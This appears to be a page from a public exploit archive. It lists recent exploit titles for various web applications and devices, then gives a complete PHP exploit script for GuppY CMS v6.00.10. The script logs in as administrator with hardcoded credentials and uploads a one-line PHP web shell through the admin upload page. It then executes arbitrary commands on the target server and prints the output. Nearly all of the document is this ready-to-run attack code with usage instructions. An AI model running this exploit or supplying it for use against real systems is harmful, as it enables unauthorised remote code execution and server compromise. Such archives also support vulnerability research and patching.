79023d1f9c
22 changes to exploits/shellcodes/ghdb Password Manager for IIS v2.0 - XSS DLink DIR 819 A1 - Denial of Service D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Abantecart v1.3.2 - Authenticated Remote Code Execution Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Employee Performance Evaluation System v1.0 - File Inclusion and RCE GuppY CMS v6.00.10 - Remote Code Execution Human Resources Management System v1.0 - Multiple SQLi ImpressCMS v1.4.3 - Authenticated SQL Injection Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Yoga Class Registration System v1.0 - Multiple SQLi NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle _camp_ Raspberry Pi camera server 1.0 - Authentication Bypass System Mechanic v15.5.0.61 - Arbitrary Read/Write
124 lines
No EOL
3.4 KiB
Text
124 lines
No EOL
3.4 KiB
Text
# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
|
|
# Date: Sep 30, 2022
|
|
# Exploit Author: Chokri Hammedi
|
|
# Vendor Homepage: https://www.freeguppy.org/
|
|
# Software Link:
|
|
https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
|
|
# Version: 6.00.10
|
|
# Tested on: Linux
|
|
|
|
#!/usr/bin/php
|
|
|
|
<?php
|
|
|
|
$username = "Admin2"; //Administrator username
|
|
$password = "rose1337"; //Administrator password
|
|
|
|
|
|
$options = getopt('u:c:');
|
|
|
|
if(!isset($options['u'], $options['c']))
|
|
die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
|
|
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
|
|
|
|
\n");
|
|
|
|
$target = $options['u'];
|
|
|
|
$command = $options['c'];
|
|
|
|
// Administrator login
|
|
|
|
$cookie="cookie.txt";
|
|
$url = "{$target}guppy/connect.php";
|
|
|
|
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
|
|
$curlObj = curl_init();
|
|
|
|
curl_setopt($curlObj, CURLOPT_URL, $url);
|
|
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
|
|
curl_setopt($curlObj, CURLOPT_HEADER, 1);
|
|
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
|
|
curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
|
|
curl_setopt ($curlObj, CURLOPT_POST, 1);
|
|
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
|
|
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
|
|
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
|
|
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
|
|
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
|
|
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
|
|
$result = curl_exec($curlObj);
|
|
|
|
|
|
// uploading shell
|
|
|
|
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
|
|
|
|
$post='------WebKitFormBoundarygA1APFcUlkIaWal4
|
|
Content-Disposition: form-data; name="rep"
|
|
|
|
file
|
|
------WebKitFormBoundarygA1APFcUlkIaWal4
|
|
Content-Disposition: form-data; name="ficup"; filename="shell.php"
|
|
Content-Type: application/x-php
|
|
|
|
<?php system($_GET["cmd"]); ?>
|
|
|
|
------WebKitFormBoundarygA1APFcUlkIaWal4--
|
|
';
|
|
|
|
$headers = array(
|
|
|
|
|
|
'Content-Type: multipart/form-data;
|
|
boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
|
|
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
|
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
|
|
|
|
'Accept-Encoding: gzip, deflate',
|
|
'Accept-Language: en-US,en;q=0.9'
|
|
);
|
|
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
|
|
curl_setopt($curlObj, CURLOPT_URL, $url2);
|
|
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
|
|
curl_setopt($curlObj, CURLOPT_POST, true);
|
|
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
|
|
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
|
|
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
|
|
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
|
|
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
|
|
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
|
|
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
|
|
|
|
$data = curl_exec($curlObj);
|
|
|
|
|
|
// Executing the shell
|
|
|
|
|
|
$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
|
|
curl_setopt($curlObj, CURLOPT_URL, $shell);
|
|
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
|
|
application/x-www-form-urlencoded'));
|
|
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
|
|
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
|
|
curl_setopt($curlObj, CURLOPT_HEADER, False);
|
|
curl_setopt($curlObj, CURLOPT_POST, false);
|
|
|
|
$exec_shell = curl_exec($curlObj);
|
|
|
|
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
|
|
|
|
if($code != 200) {
|
|
echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
|
|
credentials\n";
|
|
}
|
|
else {
|
|
|
|
print("\n");
|
|
print($exec_shell);
|
|
|
|
}
|
|
curl_close($curlObj);
|
|
|
|
?> |